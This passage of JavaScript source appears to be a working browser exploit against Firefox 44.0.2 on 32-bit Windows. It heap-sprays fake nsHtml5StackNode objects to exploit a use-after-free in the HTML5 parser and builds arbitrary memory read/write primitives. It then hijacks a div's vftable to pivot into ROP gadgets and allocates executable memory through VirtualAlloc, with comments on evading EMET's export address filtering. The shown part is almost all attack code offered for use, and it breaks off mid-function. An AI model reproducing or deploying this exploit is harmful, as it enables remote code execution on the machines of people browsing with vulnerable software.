 285 |         const origStack = this.rwx.readDWords(stackAddr, stackGadgets.length);
 286 |         this.rwx.writeDWords(stackAddr, stackGadgets);
 287 | 
 288 | 
 289 |         /*********************
 290 |          * first stage gadgets
 291 |          *********************/
 292 |         /*
 293 |          * pivot
 294 |          *
 295 |          * xchg eax, esp
 296 |          * ret 0x2de8
 297 |          */
 298 |         const pivot = this.rop.search([0x94, 0xc2, 0xe8, 0x2d]);
 299 | 
 300 |         /*
 301 |          * preserve old esp in a nonvolatile register
 302 |          *
 303 |          * xchg eax, edi
 304 |          * ret
 305 |          */
 306 |         const after = this.rop.search([0x97, 0xc3]);
 307 | 
 308 |         /*
 309 |          * pivot to the second stage
 310 |          *
 311 |          * pop esp
 312 |          * ret
 313 |          */
 314 |         u32array[this.rwx.div.mem.idx + 2941] = this.rop.search([0x5c, 0xc3]);
 315 |         u32array[this.rwx.div.mem.idx + 2942] = stackAddr;
 316 | 
 317 |         /*
 318 |          * here we go :)
 319 |          */
 320 |         this.rwx.execute(pivot, after);
 321 |         this.rwx.writeDWords(stackAddr, origStack);
 322 | 
 323 |         if (u32array[ret.idx] === 0) {
 324 |             throw new Error("uprv_malloc_55() failed");
 325 |         }
 326 |         return u32array[ret.idx];
 327 |     };
 328 | 
 329 |     /*
 330 |      * Overrides the pointers in firefox-44.0.2/intl/icu/source/common/cmemory.c
 331 |      */
 332 |     this.u_setMemoryFunctions_55 = function(context, a, r, f, status) {
 333 |         const func = this.kernel32.GetProcAddress(this.icuuc55handle,
 334 |                                                   "u_setMemoryFunctions_55");
 335 |         this.rop.execute(func, [context, a, r, f, status], true);
 336 |     };
 337 | 
 338 |     /*
 339 |      * Sets `pAlloc' to VirtualAlloc.  `pRealloc' and `pFree' are
 340 |      * set to point to small gadgets.
 341 |      */
 342 |     this.set = function() {
 343 |         const status = this.rwx.calloc(4);
 344 |         const alloc = this.pe.search("kernel32.dll", "VirtualAlloc");
 345 | 
 346 |         /* pretend to be a failed reallocation
 347 |          *
 348 |          * xor eax, eax
 349 |          * ret */
 350 |         const realloc = this.rop.search([0x33, 0xc0, 0xc3]);
 351 | 
 352 |         /* let the chunk live
 353 |          *
 354 |          * ret */
 355 |         const free = this.rop.search([0xc3]);
 356 | 
 357 |         this.u_setMemoryFunctions_55(0, alloc, realloc, free, status.addr);
 358 |         if (this.rwx.u32array[status.idx] !== 0) {
 359 |             throw new Error("u_setMemoryFunctions_55() failed");
 360 |         }
 361 |     };
 362 | 
 363 |     /*
 364 |      * This (sort of) restores the functionality in
 365 |      * intl/icu/source/common/cmemory.c by reusing the previously
 366 |      * allocated PAGE_EXECUTE_READWRITE chunk to set up three stubs that
 367 |      * invokes an appropriate function in mozglue.dll
 368 |      */
 369 |     this.reset = function(chunk) {
 370 |         const u32array = this.rwx.u32array;
 371 |         const status = this.rwx.calloc(4);
 372 | 
 373 |         /*
 374 |          * pFree
 375 |          */
 376 |         const free = {};
 377 |         free.addr = chunk;
 378 |         free.func = this.rwx.calloc(4);
 379 |         free.func.str = this.dword2str(free.func.addr);
 380 |         free.code = [
 381 |             "\x8b\x84\x24\x08\x00\x00\x00", /* mov eax, dword [esp + 0x8] */
 382 |             "\x50",                         /* push eax */
 383 |             "\x8b\x05" + free.func.str,     /* mov eax, [location-of-free] */
 384 |             "\xff\xd0",                     /* call eax */
 385 |             "\x59",                         /* pop ecx */
 386 |             "\xc3",                         /* ret */
 387 |         ].join("");
 388 |         u32array[free.func.idx] = this.pe.search("mozglue.dll", "free");
 389 |         this.rwx.writeString(free.addr, free.code);
 390 | 
 391 |         /*
 392 |          * pAlloc
 393 |          */
 394 |         const alloc = {};
 395 |         alloc.addr = chunk + free.code.length;
 396 |         alloc.func = this.rwx.calloc(4);
 397 |         alloc.func.str = this.dword2str(alloc.func.addr);
 398 |         alloc.code = [
 399 |             "\x8b\x84\x24\x08\x00\x00\x00", /* mov eax, dword [esp + 0x8] */
 400 |             "\x50",                         /* push eax */
 401 |             "\x8b\x05" + alloc.func.str,    /* mov eax, [location-of-alloc] */
 402 |             "\xff\xd0",                     /* call eax */
 403 |             "\x59",                         /* pop ecx */
 404 |             "\xc3",                         /* ret */
 405 |         ].join("");
 406 |         u32array[alloc.func.idx] = this.pe.search("mozglue.dll", "malloc");
 407 |         this.rwx.writeString(alloc.addr, alloc.code);
 408 | 
 409 |         /*
 410 |          * pRealloc
 411 |          */
 412 |         const realloc = {};
 413 |         realloc.addr = chunk + free.code.length + alloc.code.length;
 414 |         realloc.func = this.rwx.calloc(4);
 415 |         realloc.func.str = this.dword2str(realloc.func.addr);
 416 |         realloc.code = [
 417 |             "\x8b\x84\x24\x0c\x00\x00\x00", /* mov eax, dword [esp + 0xc] */
 418 |             "\x50",                         /* push eax */
 419 |             "\x8b\x84\x24\x0c\x00\x00\x00", /* mov eax, dword [esp + 0xc] */
 420 |             "\x50",                         /* push eax */
 421 |             "\x8b\x05" + realloc.func.str,  /* mov eax, [location-of-realloc] */
 422 |             "\xff\xd0",                     /* call eax */
 423 |             "\x59",                         /* pop ecx */
 424 |             "\x59",                         /* pop ecx */
 425 |             "\xc3",                         /* ret */
 426 |         ].join("");
 427 |         u32array[realloc.func.idx] = this.pe.search("mozglue.dll", "realloc");
 428 |         this.rwx.writeString(realloc.addr, realloc.code);
 429 | 
 430 |         this.u_setMemoryFunctions_55(0,
 431 |                                      alloc.addr,
 432 |                                      realloc.addr,
 433 |                                      free.addr,
 434 |                                      status.addr);
 435 |         if (u32array[status.idx] !== 0) {
 436 |             throw new Error("u_setMemoryFunctions_55() failed");
 437 |         }
 438 |     };
 439 | 
 440 |     /*
 441 |      * Allocates a small chunk of memory marked RWX, which is used
 442 |      * to allocate a `size'-byte chunk (see uprv_malloc_55()).  The
 443 |      * first allocation is then repurposed in reset().
 444 |      */
 445 |     this.alloc = function(stackAddr, size) {
 446 |         /*
 447 |          * hijack the function pointers
 448 |          */
 449 |         this.set();
 450 | 
 451 |         /*
 452 |          * do the initial 0x40 byte allocation
 453 |          */
 454 |         const chunk = this.uprv_malloc_55(stackAddr);
 455 |         log("allocated 0x40 byte chunk at 0x" + chunk.toString(16));
 456 | 
 457 |         /*
 458 |          * allocate a larger chunk now that we're no longer limited to ROP/JOP
 459 |          */
 460 |         const u32array = this.rwx.u32array;
 461 |         const func = this.rwx.calloc(4);
 462 |         func.str = this.dword2str(func.addr);
 463 |         u32array[func.idx] = this.pe.search("kernel32.dll", "VirtualAlloc");
 464 |         const code = [
 465 |             "\x87\xe7",                    /* xchg edi, esp (orig stack) */
 466 |             "\x6a\x40",                    /* push 0x40 (flProtect) */
 467 |             "\x68\x00\x10\x00\x00",        /* push 0x1000 (flAllocationType) */
 468 |             "\xb8" + this.dword2str(size), /* move eax, size */
 469 |             "\x50",                        /* push eax (dwSize) */
 470 |             "\x6a\x00",                    /* push 0 (lpAddress) */
 471 |             "\x8b\x05" + func.str,         /* mov eax, [loc-of-VirtualAlloc] */
 472 |             "\xff\xd0",                    /* call eax */
 473 |             "\x87\xe7",                    /* xchg edi, esp (back to heap) */
 474 |             "\xc3",                        /* ret */
 475 |         ].join("");
 476 |         this.rwx.writeString(chunk, code);
 477 |         const newChunk = this.rop.execute(chunk, [], false);
 478 |         log("allocated " + size + " byte chunk at 0x" + newChunk.toString(16));
 479 | 
 480 |         /*
 481 |          * repurpose the first rwx chunk to restore functionality
 482 |          */
 483 |         this.reset(chunk);
 484 | 
 485 |         return newChunk;
 486 |     };
 487 | 
 488 |     this.dword2str = function(dword) {
 489 |         let str = "";
 490 |         for (let i = 0; i < 4; i++) {
 491 |             str += String.fromCharCode((dword >> 8 * i) & 0xff);
 492 |         }
 493 |         return str;
 494 |     };
 495 | }
 496 | 
 497 | function KERNEL32(rop, pe, rwx) {
 498 |     this.rop = rop;
 499 |     this.pe = pe;
 500 |     this.rwx = rwx;
 501 | 
 502 |     /*
 503 |      * Retrieves a handle for an imported module
 504 |      */
 505 |     this.GetModuleHandleA = function(lpModuleName) {
 506 |         const func = this.pe.search("kernel32.dll", "GetModuleHandleA");
 507 |         const name = this.rwx.copyString(lpModuleName);
 508 |         const module = this.rop.execute(func, [name.addr], false);
 509 |         if (module === 0) {
 510 |             throw new Error("could not get a handle for " + lpModuleName);
 511 |         }
 512 |         return module;
 513 |     };
 514 | 
 515 |     /*
 516 |      * Retrieves the address of an exported symbol.  Do not invoke this
 517 |      * function on protected modules (if you want to bypass EAF); instead
 518 |      * try to locate the symbol in any of the import tables or choose
 519 |      * another target.
 520 |      */
 521 |     this.GetProcAddress = function(hModule, lpProcName) {
 522 |         const func = this.pe.search("kernel32.dll", "GetProcAddress");
 523 |         const name = this.rwx.copyString(lpProcName);
 524 |         const addr = this.rop.execute(func, [hModule, name.addr], false);
 525 |         if (addr === 0) {
 526 |             throw new Error("could not get address for " + lpProcName);
 527 |         }
 528 |         return addr;
 529 |     };
 530 | 
 531 |     /*
 532 |      * Retrieves a handle for the current thread
 533 |      */
 534 |     this.GetCurrentThread = function() {
 535 |         const func = this.pe.search("kernel32.dll", "GetCurrentThread");
 536 |         return this.rop.execute(func, [], false);
 537 |     };
 538 | }
 539 | 
 540 | function NTDLL(rop, pe, rwx) {
 541 |     this.rop = rop;
 542 |     this.pe = pe;
 543 |     this.rwx = rwx;
 544 | 
 545 |     /*
 546 |      * Retrieves the stack limit from the Thread Environment Block
 547 |      */
 548 |     this.getStackLimit = function(ThreadHandle) {
 549 |         const mem = this.rwx.calloc(0x1c);
 550 |         this.NtQueryInformationThread(ThreadHandle, 0, mem.addr, mem.size, 0);
 551 |         return this.rwx.readDWord(this.rwx.u32array[mem.idx+1] + 8);
 552 |     };
 553 | 
 554 |     /*
 555 |      * Retrieves thread information
 556 |      */
 557 |     this.NtQueryInformationThread = function(ThreadHandle,
 558 |                                              ThreadInformationClass,
 559 |                                              ThreadInformation,
 560 |                                              ThreadInformationLength,
 561 |                                              ReturnLength) {
 562 |         const func = this.pe.search("ntdll.dll", "NtQueryInformationThread");
 563 |         const ret = this.rop.execute(func, arguments, false);
 564 |         if (ret !== 0) {
 565 |             throw new Error("NtQueryInformationThread failed");
 566 |         }
 567 |         return ret;
 568 |     };
 569 | }
 570 | 
 571 | function ReadWriteExecute(u32base, u32array, array) {
 572 |     this.u32base = u32base;
 573 |     this.u32array = u32array;
 574 |     this.array = array;
 575 | 
 576 |     /*
 577 |      * Reads `length' bytes from `addr' through a fake string
 578 |      */
 579 |     this.readBytes = function(addr, length) {
 580 |         /* create a string-jsval */
 581 |         this.u32array[4] = this.u32base + 6*4;   /* addr to meta */
 582 |         this.u32array[5] = 0xffffff85;           /* type (JSVAL_TAG_STRING) */
 583 | 
 584 |         /* metadata */
 585 |         this.u32array[6] = 0x49;   /* flags */
 586 |         this.u32array[7] = length; /* read size */
 587 |         this.u32array[8] = addr;   /* memory to read */
 588 | 
 589 |         /* Uint8Array is *significantly* slower, which kills our ROP hunting */
 590 |         const result = new Array();
 591 | 
 592 |         const str = this.getArrayElem(4);
 593 |         for (let i = 0; i < str.length; i++) {
 594 |             result[i] = str.charCodeAt(i);
 595 |         }
 596 | 
 597 |         return result;
 598 |     };
 599 | 
 600 |     this.readDWords = function(addr, num) {
 601 |         const bytes = this.readBytes(addr, num * 4);
 602 |         const dwords = new Uint32Array(num);
 603 |         for (let i = 0; i < bytes.length; i += 4) {
 604 |             for (let j = 0; j < 4; j++) {
 605 |                 dwords[i/4] |= bytes[i+j] << (8 * j);
 606 |             }
 607 |         }
 608 |         return dwords;
 609 |     };
 610 | 
 611 |     this.readDWord = function(addr) {
 612 |         return this.readDWords(addr, 1)[0];
 613 |     };
 614 | 
 615 |     this.readWords = function(addr, num) {
 616 |         const bytes = this.readBytes(addr, num * 2);
 617 |         const words = new Uint16Array(num);
 618 |         for (let i = 0; i < bytes.length; i += 2) {
 619 |             for (let j = 0; j < 2; j++) {
 620 |                 words[i/2] |= bytes[i+j] << (8 * j);
 621 |             }
 622 |         }
 623 |         return words;
 624 |     };
 625 | 
 626 |     this.readWord = function(addr) {
 627 |         return this.readWords(addr, 1)[0];
 628 |     };
 629 | 
 630 |     this.readString = function(addr) {
 631 |         for (let i = 0, str = ""; ; i++) {
 632 |             const chr = this.readBytes(addr + i, 1)[0];
 633 |             if (chr === 0) {
 634 |                 return str;
 635 |             }
 636 |             str += String.fromCharCode(chr);
 637 |         }
 638 |     };
 639 | 
 640 |     /*
 641 |      * Writes `values' to `addr' by using the metadata of an Uint8Array
 642 |      * to set up a write primitive
 643 |      */
 644 |     this.writeBytes = function(addr, values) {
 645 |         /* create jsval */
 646 |         const jsMem = this.calloc(8);
 647 |         this.setArrayElem(jsMem.idx, new Uint8Array(values.length));
 648 | 
 649 |         /* copy metadata */
 650 |         const meta = this.readDWords(this.u32array[jsMem.idx], 12);
 651 |         const metaMem = this.calloc(meta.length * 4);
 652 |         for (let i = 0; i < meta.length; i++) {
 653 |             this.u32array[metaMem.idx + i] = meta[i];
 654 |         }
 655 | 
 656 |         /* change the pointer to the contents of the Uint8Array */
 657 |         this.u32array[metaMem.idx + 10] = addr;
 658 | 
 659 |         /* change the pointer to the metadata */
 660 |         const oldMeta = this.u32array[jsMem.idx];
 661 |         this.u32array[jsMem.idx] = metaMem.addr;
 662 | 
 663 |         /* write */
 664 |         const u8 = this.getArrayElem(jsMem.idx);
 665 |         for (let i = 0; i < values.length; i++) {
 666 |             u8[i] = values[i];
 667 |         }
 668 | 
 669 |         /* clean up */
 670 |         this.u32array[jsMem.idx] = oldMeta;
 671 |     };
 672 | 
 673 |     this.writeDWords = function(addr, values) {
 674 |         const u8 = new Uint8Array(values.length * 4);
 675 |         for (let i = 0; i < values.length; i++) {
 676 |             for (let j = 0; j < 4; j++) {
 677 |                 u8[i*4 + j] = values[i] >> (8 * j) & 0xff;
 678 |             }
 679 |         }
 680 |         this.writeBytes(addr, u8);
 681 |     };
 682 | 
 683 |     this.writeDWord = function(addr, value) {
 684 |         const u32 = new Uint32Array(1);
 685 |         u32[0] = value;
 686 |         this.writeDWords(addr, u32);
 687 |     };
 688 | 
 689 |     this.writeString = function(addr, str) {
 690 |         const u8 = new Uint8Array(str.length);
 691 | 
 692 |         for (let i = 0; i < str.length; i++) {
 693 |             u8[i] = str.charCodeAt(i);
 694 |         }
 695 |         this.writeBytes(addr, u8);
 696 |     };
 697 | 
 698 |     /*
 699 |      * Copies a string to the `u32array' and returns an object from
 700 |      * calloc().
 701 |      *
 702 |      * This is an ugly workaround to allow placing a string at a known
 703 |      * location without having to implement proper support for JSString
 704 |      * and its various string types.
 705 |      */
 706 |     this.copyString = function(str) {
 707 |         str += "\x00".repeat(4 - str.length % 4);
 708 |         const mem = this.calloc(str.length);
 709 | 
 710 |         for (let i = 0, j = 0; i < str.length; i++) {
 711 |             if (i && !(i % 4)) {
 712 |                 j++;
 713 |             }
 714 |             this.u32array[mem.idx + j] |= str.charCodeAt(i) << (8 * (i % 4));
 715 |         }
 716 |         return mem;
 717 |     };
 718 | 
 719 |     /*
 720 |      * Creates a <div> and copies the contents of its vftable to
 721 |      * writable memory.
 722 |      */
 723 |     this.createExecuteDiv = function() {
 724 |         const div = {};
 725 | 
 726 |         /* 0x3000 bytes should be enough for the div, vftable and gadgets */
 727 |         div.mem = this.calloc(0x3000);
 728 | 
 729 |         div.elem = document.createElement("div");
 730 |         this.setArrayElem(div.mem.idx, div.elem);
 731 | 
 732 |         /* addr of the div */
 733 |         const addr = this.u32array[div.mem.idx];
 734 | 
 735 |         /* *(addr+4) = this */
 736 |         const ths = this.readDWord(addr + 4*4);
 737 | 
 738 |         /* *this = xul!mozilla::dom::HTMLDivElement::`vftable' */
 739 |         const vftable = this.readDWord(ths);
 740 | 
 741 |         /* copy the vftable (the size is a guesstimate) */
 742 |         const entries = this.readDWords(vftable, 512);
 743 |         this.writeDWords(div.mem.addr + 4*2, entries);
 744 | 
 745 |         /* replace the pointer to the original vftable with ours */
 746 |         this.writeDWord(ths, div.mem.addr + 4*2);
 747 | 
 748 |         return div;
 749 |     };
 750 | 
 751 |     /*
 752 |      * Replaces two vftable entries of the previously created div and
 753 |      * triggers code execution
 754 |      */
 755 |     this.execute = function(pivot, postPivot) {
 756 |         /* vftable entry for xul!nsGenericHTMLElement::QueryInterface
 757 |          * kind of ugly, but we'll land here after the pivot that's used
 758 |          * in ROPHelper.execute() */
 759 |         const savedQueryInterface = this.u32array[this.div.mem.idx + 2];
 760 |         this.u32array[this.div.mem.idx + 2] = postPivot;
 761 | 
 762 |         /* vftable entry for xul!nsGenericHTMLElement::Click */
 763 |         const savedClick = this.u32array[this.div.mem.idx + 131];
 764 |         this.u32array[this.div.mem.idx + 131] = pivot;
 765 | 
 766 |         /* execute */
 767 |         this.div.elem.click();
 768 | 
 769 |         /* restore our overwritten vftable pointers */
 770 |         this.u32array[this.div.mem.idx + 2] = savedQueryInterface;
 771 |         this.u32array[this.div.mem.idx + 131] = savedClick;
 772 |     };
 773 | 
 774 |     /*
 775 |      * Reserves space in the `u32array' and initializes it to 0.
 776 |      *
 777 |      * Returns an object with the following properties:
 778 |      * - idx: index of the start of the allocation in the u32array
 779 |      * - addr: start address of the allocation
 780 |      * - size: non-padded allocation size
 781 |      * - realSize: padded size
 782 |      */
 783 |     this.calloc = function(size) {
 784 |         let padded = size;
 785 |         if (!size || size % 4) {
 786 |             padded += 4 - size % 4;
 787 |         }
 788 | 
 789 |         const found = [];
 790 |         /* the first few dwords are reserved for the metadata belonging
 791 |          * to `this.array' and for the JSString in readBytes (since using
 792 |          * this function would impact the speed of the ROP hunting) */
 793 |         for (let i = 10; i < this.u32array.length - 1; i += 2) {
 794 |             if (this.u32array[i] === 0x11223344 &&
 795 |                 this.u32array[i+1] === 0x55667788) {
 796 |                 found.push(i, i+1);
 797 |                 if (found.length >= padded / 4) {
 798 |                     for (let j = 0; j < found.length; j++) {
 799 |                         this.u32array[found[j]] = 0;
 800 |                     }
 801 |                     return {
 802 |                         idx: found[0],
 803 |                         addr: this.u32base + found[0]*4,
 804 |                         size: size,
 805 |                         realSize: padded,
 806 |                     };
 807 |                 }
 808 |             } else {
 809 |                 found.length = 0;
 810 |             }
 811 |         }
 812 |         throw new Error("calloc(): out of memory");
 813 |     };
 814 | 
 815 |     /*
 816 |      * Returns an element in `array' based on an index for `u32array'
 817 |      */
 818 |     this.getArrayElem = function(idx) {
 819 |         if (idx <= 3 || idx % 2) {
 820 |             throw new Error("invalid index");
 821 |         }
 822 |         return this.array[(idx - 4) / 2];
 823 |     };
 824 | 
 825 |     /*
 826 |      * Sets an element in `array' based on an index for `u32array'
 827 |      */
 828 |     this.setArrayElem = function(idx, value) {
 829 |         if (idx <= 3 || idx % 2) {
 830 |             throw new Error("invalid index");
 831 |         }
 832 |         this.array[(idx - 4) / 2] = value;
 833 |     };
 834 | 
 835 |     this.div = this.createExecuteDiv();
 836 | }
 837 | 
 838 | function PortableExecutable(base, rwx) {
 839 |     this.base = base;
 840 |     this.rwx = rwx;
 841 |     this.imports = {};
 842 |     this.text = {};
 843 | 
 844 |     /*
 845 |      * Parses the PE import table.  Some resources of interest:
 846 |      *
 847 |      * - An In-Depth Look into the Win32 Portable Executable File Format
 848 |      *   https://msdn.microsoft.com/en-us/magazine/bb985992(printer).aspx
 849 |      *
 850 |      * - Microsoft Portable Executable and Common Object File Format Specification
 851 |      *   https://www.microsoft.com/en-us/download/details.aspx?id=19509
 852 |      *
 853 |      * - Understanding the Import Address Table
 854 |      *   http://sandsprite.com/CodeStuff/Understanding_imports.html
 855 |      */
 856 |     this.read = function() {
 857 |         const rwx = this.rwx;
 858 |         let addr = this.base;
 859 | 
 860 |         /*
 861 |          * DOS header
 862 |          */
 863 |         const magic = rwx.readWord(addr);
 864 |         if (magic !== 0x5a4d) {
 865 |             throw new Error("bad DOS header");
 866 |         }
 867 |         const lfanew = rwx.readDWord(addr + 0x3c, 4);
 868 |         addr += lfanew;
 869 | 
 870 |         /*
 871 |          * Signature
 872 |          */
 873 |         const signature = rwx.readDWord(addr);
 874 |         if (signature !== 0x00004550) {
 875 |             throw new Error("bad signature");
 876 |         }
 877 |         addr += 4;
 878 | 
 879 |         /*
 880 |          * COFF File Header
 881 |          */
 882 |         addr += 20;
 883 | 
 884 |         /*
 885 |          * Optional Header
 886 |          */
 887 |         const optionalMagic = rwx.readWord(addr);
 888 |         if (optionalMagic !== 0x010b) {
 889 |             throw new Error("bad optional header");
 890 |         }
 891 | 
 892 |         this.text.size = rwx.readDWord(addr + 4);
 893 |         this.text.base = this.base + rwx.readDWord(addr + 20);
 894 | 
 895 |         const numberOfRvaAndSizes = rwx.readDWord(addr + 92);
 896 |         addr += 96;
 897 | 
 898 |         /*
 899 |          * Optional Header Data Directories
 900 |          *
 901 |          * N entries * 2 DWORDs (RVA and size)
 902 |          */
 903 |         const directories = rwx.readDWords(addr, numberOfRvaAndSizes * 2);
 904 | 
 905 |         for (let i = 0; i < directories[3] - 5*4; i += 5*4) {
 906 |             /* Import Directory Table (N entries * 5 DWORDs) */
 907 |             const members = rwx.readDWords(this.base + directories[2] + i, 5);
 908 |             const lookupTable = this.base + members[0];
 909 |             const dllName = rwx.readString(this.base+members[3]).toLowerCase();
 910 |             const addrTable = this.base + members[4];
 911 | 
 912 |             this.imports[dllName] = {};
 913 | 
 914 |             /* Import Lookup Table */
 915 |             for (let j = 0; ; j += 4) {
 916 |                 const hintNameRva = rwx.readDWord(lookupTable + j);
 917 |                 /* the last entry is NULL */
 918 |                 if (hintNameRva === 0) {
 919 |                     break;
 920 |                 }
 921 | 
 922 |                 /* name is not available if the dll is imported by ordinal */
 923 |                 if (hintNameRva & (1 << 31)) {
 924 |                     continue;
 925 |                 }
 926 | 
 927 |                 const importName = rwx.readString(this.base + hintNameRva + 2);
 928 |                 const importAddr = rwx.readDWord(addrTable + j);
 929 |                 this.imports[dllName][importName] = importAddr;
 930 |             }
 931 |         }
 932 |     };
 933 | 
 934 |     /*
 935 |      * Searches for an imported symbol
 936 |      */
 937 |     this.search = function(dll, symbol) {
 938 |         if (this.imports[dll] === undefined) {
 939 |             throw new Error("unknown dll: " + dll);
 940 |         }
 941 | 
 942 |         const addr = this.imports[dll][symbol];
 943 |         if (addr === undefined) {
 944 |             throw new Error("unknown symbol: " + symbol);
 945 |         }
 946 |         return addr;
 947 |     };
 948 | }
 949 | 
 950 | function Spray() {
 951 |     this.nodeBase = 0x80000000;
 952 |     this.ptrNum = 64;
 953 |     this.refcount = 0xffffffff;
 954 |     /*
 955 |      * 0:005> ?? sizeof(nsHtml5StackNode)
 956 |      * unsigned int 0x1c
 957 |      */
 958 |     this.nsHtml5StackNodeSize = 0x1c;
 959 | 
 960 |     /*
 961 |      * Creates a bunch of fake nsHtml5StackNode:s with the hope of hitting
 962 |      * the address of elementName->name when it's [xul!nsHtml5Atoms::style].
 963 |      *
 964 |      * Ultimately, the goal is to enter the conditional on line 2743:
 965 |      *
 966 |      * firefox-44.0.2/parser/html/nsHtml5TreeBuilder.cpp:2743
 967 |      * ,----
 968 |      * | 2214 void
 969 |      * | 2215 nsHtml5TreeBuilder::endTag(nsHtml5ElementName* elementName)
 970 |      * | 2216 {
 971 |      * | ....
 972 |      * | 2221   nsIAtom* name = elementName->name;
 973 |      * | ....
 974 |      * | 2741   for (; ; ) {
 975 |      * | 2742     nsHtml5StackNode* node = stack[eltPos];
 976 |      * | 2743     if (node->ns == kNameSpaceID_XHTML && node->name == name) {
 977 |      * | ....
 978 |      * | 2748       while (currentPtr >= eltPos) {
 979 |      * | 2749         pop();
 980 |      * | 2750       }
 981 |      * | 2751       NS_HTML5_BREAK(endtagloop);
 982 |      * | 2752     } else if (node->isSpecial()) {
 983 |      * | 2753       errStrayEndTag(name);
 984 |      * | 2754       NS_HTML5_BREAK(endtagloop);
 985 |      * | 2755     }
 986 |      * | 2756     eltPos--;
 987 |      * | 2757   }
 988 |      * | ....
 989 |      * | 3035 }
 990 |      * `----
 991 |      *
 992 |      * We get 64 attempts each time the bug is triggered -- however, in
 993 |      * order to have a clean break, the last node has its flags set to
 994 |      * NS_HTML5ELEMENT_NAME_SPECIAL, so that the conditional on line
 995 |      * 2752 is entered.
 996 |      *
 997 |      * If we do find ourselves with a node->name == name, then
 998 |      * nsHtml5TreeBuilder::pop() invokes nsHtml5StackNode::release().
 999 |      * The release() method decrements the nodes refcount -- and, if the
1000 |      * refcount reaches 0, also deletes it.
1001 |      *
1002 |      * Assuming everything goes well, the Uint32Array is allocated with
1003 |      * the method presented by SkyLined/@berendjanwever in:
1004 |      *
1005 |      * "Heap spraying high addresses in 32-bit Chrome/Firefox on 64-bit Windows"
1006 |      * http://blog.skylined.nl/20160622001.html
1007 |      */
1008 |     this.nodes = function(name, bruteforce) {
1009 |         const nodes = new Uint32Array(0x19000000);
1010 |         const size = this.nsHtml5StackNodeSize / 4;
1011 |         const refcount = bruteforce ? this.refcount : 1;
1012 |         let flags = 0;
1013 | 
1014 |         for (let i = 0; i < this.ptrNum * size; i += size) {
1015 |             if (i === (this.ptrNum - 1) * size) {
1016 |                 flags = 1 << 29; /* NS_HTML5ELEMENT_NAME_SPECIAL */
1017 |                 name = 0x0;
1018 |             }
1019 |             nodes[i] = flags;
1020 |             nodes[i+1] = name;
1021 |             nodes[i+2] = 0; /* popName */
1022 |             nodes[i+3] = 3; /* ns (kNameSpaceID_XHTML) */
1023 |             nodes[i+4] = 0; /* node */
1024 |             nodes[i+5] = 0; /* attributes */
1025 |             nodes[i+6] = refcount;
1026 |             name += 0x100000;
1027 |         }
1028 |         return nodes;
1029 |     };
1030 | 
1031 |     /*
1032 |      * Sprays pointers to the fake nsHtml5StackNode:s created in nodes()
1033 |      */
1034 |     this.pointers = function() {
1035 |         const pointers = new Array();
1036 | 
1037 |         for (let i = 0; i < 0x30000; i++) {
1038 |             pointers[i] = new Uint32Array(this.ptrNum);
1039 |             let node = this.nodeBase;
1040 |             for (let j = pointers[i].length - 1; j >= 0; j--) {
1041 |                 pointers[i][j] = node;
1042 |                 node += this.nsHtml5StackNodeSize;
1043 |             }
1044 |         }
1045 |         return pointers;
1046 |     };
1047 | 
1048 |     /*
1049 |      * Sprays a bunch of arrays with the goal of having one hijack the
1050 |      * previously freed Uint32Array
1051 |      */
1052 |     this.arrays = function() {
1053 |         const array = new Array();
1054 | 
1055 |         for (let i = 0; i < 0x800; i++) {
1056 |             array[i] = new Array();
1057 |             for (let j = 0; j < 0x10000; j++) {
1058 |                 /* 0x11223344, 0x55667788 */
1059 |                 array[i][j] = 2.5160082934009793e+103;
1060 |             }
1061 |         }
1062 |         return array;
1063 |     };
1064 | 
1065 |     /*
1066 |      * Not sure how reliable this is, but on 3 machines running win10 on
1067 |      * bare metal and on a few VMs with win7/win10 (all with and without
1068 |      * EMET), [xul!nsHtml5Atoms::style] was always found within
1069 |      * 0x[00a-1c2]f[a-f]6(c|e)0
1070 |      */
1071 |     this.getNextAddr = function(current) {
1072 |         const start = 0x00afa6c0;
1073 | 
1074 |         if (!current) {
1075 |             return start;
1076 |         }
1077 | 
1078 |         if ((current >> 20) < 0x150) {
1079 |             return current + 0x100000*(this.ptrNum-1);
1080 |         }
1081 | 
1082 |         if ((current >> 12 & 0xf) !== 0xf) {
1083 |             return (current + 0x1000) & ~(0xfff << 20) | (start >> 20) << 20;
1084 |         }
1085 | 
1086 |         if ((current >> 4 & 0xf) === 0xc) {
1087 |             return start + 0x20;
1088 |         }
1089 |         throw new Error("out of guesses");
1090 |     };
1091 | 
1092 |     /*
1093 |      * Returns the `name' from the last node with a decremented
1094 |      * refcount, if any are found
1095 |      */
1096 |     this.findStyleAddr = function(nodes) {
1097 |         const size = this.nsHtml5StackNodeSize / 4;
1098 | 
1099 |         for (let i = 64 * size - 1; i >= 0; i -= size) {
1100 |             if (nodes[i] === this.refcount - 1) {
1101 |                 return nodes[i-5];
1102 |             }
1103 |         }
1104 |     };
1105 | 
1106 |     /*
1107 |      * Locates a subarray in `array' that overlaps with `nodes'
1108 |      */
1109 |     this.findArray = function(nodes, array) {
1110 |         /* index 0..3 is metadata for `array' */
1111 |         nodes[4] = 0x41414141;
1112 |         nodes[5] = 0x42424242;
1113 | 
1114 |         for (let i = 0; i < array.length; i++) {
1115 |             if (array[i][0] === 156842099330.5098) {
1116 |                 return array[i];
1117 |             }
1118 |         }
1119 |         throw new Error("Uint32Array hijack failed");
1120 |     };
1121 | }
1122 | 
1123 | function log(msg) {
1124 |     dump("=> " + msg + "\n");
1125 |     console.log("=> " + msg);
1126 | }
1127 | 
1128 | let nodes;
1129 | let hijacked;
1130 | window.onload = function() {
1131 |     if (!navigator.userAgent.match(/Windows NT [0-9.]+; WOW64; rv:44\.0/)) {
1132 |         throw new Error("unsupported user-agent");
1133 |     }
1134 | 
1135 |     const spray = new Spray();
1136 | 
1137 |     /*
1138 |      * spray nodes
1139 |      */
1140 |     let bruteforce = true;
1141 |     let addr = spray.getNextAddr(0);
1142 |     const href = window.location.href.split("?");
1143 |     if (href.length === 2) {
1144 |         const query = href[1].split("=");
1145 |         if (query[0] === "style") {
1146 |             bruteforce = false;
1147 |         }
1148 |         addr = parseInt(query[1]);
1149 |     }
1150 |     nodes = spray.nodes(addr, bruteforce);
1151 | 
1152 |     /*
1153 |      * spray node pointers and trigger the bug
1154 |      */
1155 |     document.body.innerHTML = "<svg><img id='AAAA'>";
1156 |     const pointers = spray.pointers();
1157 |     document.getElementById("AAAA").innerHTML = "<title><template><td><tr><title><i></tr><style>td</style>";
1158 | 
1159 |     /*
1160 |      * on to the next run...
1161 |      */
1162 |     if (bruteforce === true) {
1163 |         const style = spray.findStyleAddr(nodes);
1164 |         nodes = null;
1165 |         if (style) {
1166 |             window.location = href[0] + "?style=" + style;
1167 |         } else {
